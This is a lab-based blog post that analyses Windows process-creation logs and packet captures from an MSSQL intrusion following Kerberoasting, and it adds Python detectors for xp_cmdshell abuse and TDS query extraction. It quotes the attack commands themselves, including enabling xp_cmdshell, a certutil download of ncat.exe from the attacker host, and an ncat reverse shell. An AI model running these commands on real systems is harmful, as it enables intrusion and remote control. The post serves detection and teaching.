Sunday, January 2, 2022

Analyzing the logs and packets from post-Kerberoasting activity

In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually, it instead surprised me. I was really hoping to see information such as the Workstation Name, Source Network Address and Source Port, especially when the Logon Type is reported as 3 below.

An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		SECURITYNIK\sql-service
	Account Name:		sql-service
	Account Domain:		SECURITYNIK
	Logon ID:		0x4F4F11
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.
...

Looking at another entry did pique my interest, though. Why would sqlservr.exe be spawning cmd.exe with the command line "C:\Windows\system32\cmd.exe" /c whoami? This is definitely more interesting than the above entry.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x123c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c whoami

Next up, we see cmd.exe executing whoami.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1724
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x123c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	whoami

Here we see the Domain Admins group being enumerated.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x360
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"

Here we see the host downloading ncat.exe via Certutil.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1598
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe

Here is what it looked like when ncat was executed.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc6c
	New Process Name:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1578
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe  10.0.0.107 443 --ssl --exec cmd.exe
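
The parent/child relationship in the 4688 events above is the detection opportunity: sqlservr.exe should not normally be spawning cmd.exe. The following is an added example (not from the original post): a Python parser for the plain-text event layout shown above, with a check that flags shells whose creator is sqlservr.exe and then follows what those shells launched. The sample events are constructed from the fields used here, and the parent/child rule is an assumption about what is normal on a given host.

```python
import re

SQL_PARENT = re.compile(r"\\sqlservr\.exe$", re.I)            # xp_cmdshell children have this parent
SHELLS = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.I)

# Constructed sample in the plain-text layout of Event ID 4688, trimmed to the fields used here:
# the first two events mirror the sqlservr.exe -> cmd.exe -> whoami.exe chain, the third is benign.
SAMPLE_4688 = """A new process has been created.
\tNew Process ID:\t\t0x123c
\tNew Process Name:\tC:\\Windows\\System32\\cmd.exe
\tCreator Process ID:\t0xa04
\tCreator Process Name:\tC:\\Program Files\\Microsoft SQL Server\\MSSQL13.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe
\tProcess Command Line:\t"C:\\Windows\\system32\\cmd.exe" /c whoami
A new process has been created.
\tNew Process ID:\t\t0x1724
\tNew Process Name:\tC:\\Windows\\System32\\whoami.exe
\tCreator Process ID:\t0x123c
\tCreator Process Name:\tC:\\Windows\\System32\\cmd.exe
\tProcess Command Line:\twhoami
A new process has been created.
\tNew Process ID:\t\t0x9f0
\tNew Process Name:\tC:\\Windows\\System32\\notepad.exe
\tCreator Process ID:\t0x4c8
\tCreator Process Name:\tC:\\Windows\\explorer.exe
\tProcess Command Line:\tnotepad.exe
"""

def parse_4688(text):
    """One dict per event. Section headers such as 'Process Information:' are unindented, so only
    indented fields are collected; labels repeated across Creator/Target Subject keep the first value."""
    events = []
    for block in re.split(r"(?m)^A new process has been created\.[ \t]*$", text)[1:]:
        fields = {}
        for m in re.finditer(r"^[ \t]+([^:\n]+):[ \t]*(.*?)[ \t]*$", block, re.M):
            fields.setdefault(m.group(1), m.group(2))
        events.append(fields)
    return events

def suspicious_chains(events):
    """(parent, child, command line) for shells spawned by sqlservr.exe, followed by whatever
    those shells launched. Linking is by Creator Process ID, which Windows reuses, so a real
    detection should also require the events to be close in time."""
    hits = []
    for e in events:
        if SQL_PARENT.search(e["Creator Process Name"]) and SHELLS.search(e["New Process Name"]):
            hits.append((e["Creator Process Name"], e["New Process Name"], e["Process Command Line"]))
            for g in events:
                if g["Creator Process ID"].lower() == e["New Process ID"].lower():
                    hits.append((e["New Process Name"], g["New Process Name"], g["Process Command Line"]))
    return hits
```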

While I was looking at the logs to see what transpired, I was also capturing packets using the following:

┌──(root💀securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel

Interestingly, I thought most of the communication was encrypted, but I was wrong. As I looked at a few packets, I could see the queries I executed.

Looking at the types of packets captured:

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
      tds.prelogin                       frames:1 bytes:320
        tds.prelogin                     frames:1 bytes:320
      data                               frames:135 bytes:8100
      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================

Looking at the TDS messages, first up "type == 1" (SQL batch):

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
  ....

Looking at some of the responses, "type == 4":

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021     10.0.0.5 → 10.0.0.107   TDS 91 Response
   15   0.111340     10.0.0.5 → 10.0.0.107   TDS 333 Response[Malformed Packet]
   17   0.129048     10.0.0.5 → 10.0.0.107   TDS 473 Response
   22  10.135335     10.0.0.5 → 10.0.0.107   TDS 666 Response
   26  17.489552     10.0.0.5 → 10.0.0.107   TDS 173 Response
   94 974.032998     10.0.0.5 → 10.0.0.107   TDS 294 Response
  ....

Looking at some of these messages, I see the commands I executed.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | more
Running as user "root" and group "root". This could be dangerous.
tds.type        tds.query
4
4
4
1       exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;\r\n
4
1       exec master..xp_cmdshell 'whoami'\r\n
1       exec master..xp_cmdshell 'net users'\r\n
1       exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1       exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1       exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n

I was able to see the responses also. However, in most cases it does not really make sense to post them here.
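
Here is an added example (not from the post, impacket or tshark) of how the tds.query text is recovered from the wire: Python code that reassembles TDS packets from one direction of a TCP stream, decodes the SQL batch (type 1) payloads and flags the xp_cmdshell and certutil indicators listed above. The 8-byte TDS header layout follows the protocol specification; the ALL_HEADERS handling and the encoder used to build constructed test traffic are assumptions.

```python
import re
import struct

TDS_SQL_BATCH, TDS_RESPONSE, TDS_EOM = 0x01, 0x04, 0x01  # types from the capture; EOM status bit
SUSPICIOUS = re.compile(r"xp_cmdshell|certutil\s+-urlcache", re.I)  # indicators from tds.query above

def tds_messages(stream):
    """Yield (type, payload) per complete TDS message in one direction of a TCP stream. Header:
    Type(1) Status(1) Length(2, big-endian, header included) SPID(2) PacketID(1) Window(1);
    packets without the EOM status bit are buffered until the one carrying it arrives."""
    pending, off = {}, 0
    while off + 8 <= len(stream):
        ptype, status, length = struct.unpack_from(">BBH", stream, off)
        if length < 8 or off + length > len(stream):
            raise ValueError("truncated TDS packet at offset %d" % off)
        pending[ptype] = pending.get(ptype, b"") + stream[off + 8:off + length]
        if status & TDS_EOM:
            yield ptype, pending.pop(ptype)
        off += length

def strip_all_headers(payload):
    """TDS 7.2+ clients may prefix a batch with ALL_HEADERS (impacket sends bare text). Assumed
    layout: TotalLength(4 LE) then one Transaction Descriptor header Length(4 LE) Type(2 LE)=2."""
    if len(payload) >= 10:
        total, hlen, htype = struct.unpack_from("<IIH", payload, 0)
        if 10 <= total <= len(payload) and hlen == total - 4 and htype == 0x0002:
            return payload[total:]
    return payload

def extract_queries(stream):
    """Decode the UCS-2 text of every SQL batch message, i.e. what tshark shows as tds.query."""
    return [strip_all_headers(p).decode("utf-16le")
            for t, p in tds_messages(stream) if t == TDS_SQL_BATCH]

def flag_queries(queries):
    return [q for q in queries if SUSPICIOUS.search(q)]

def build_packets(ptype, payload, chunk=None, spid=0x33):
    """Constructed encoder for test traffic: wrap payload in TDS packets, optionally split into
    chunk-byte pieces so only the last packet carries EOM (exercises the reassembly above)."""
    pieces = [payload] if chunk is None else [payload[i:i + chunk] for i in range(0, len(payload), chunk)]
    out = b""
    for i, piece in enumerate(pieces):
        status = TDS_EOM if i == len(pieces) - 1 else 0x00
        out += struct.pack(">BBHHBB", ptype, status, 8 + len(piece), spid, i + 1, 0) + piece
    return out

def batch_text(sql):
    """Encode a query as UTF-16LE with the trailing CRLF seen in the tds.query output above."""
    return (sql + "\r\n").encode("utf-16le")
```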

Ok, that's it for me and this post.
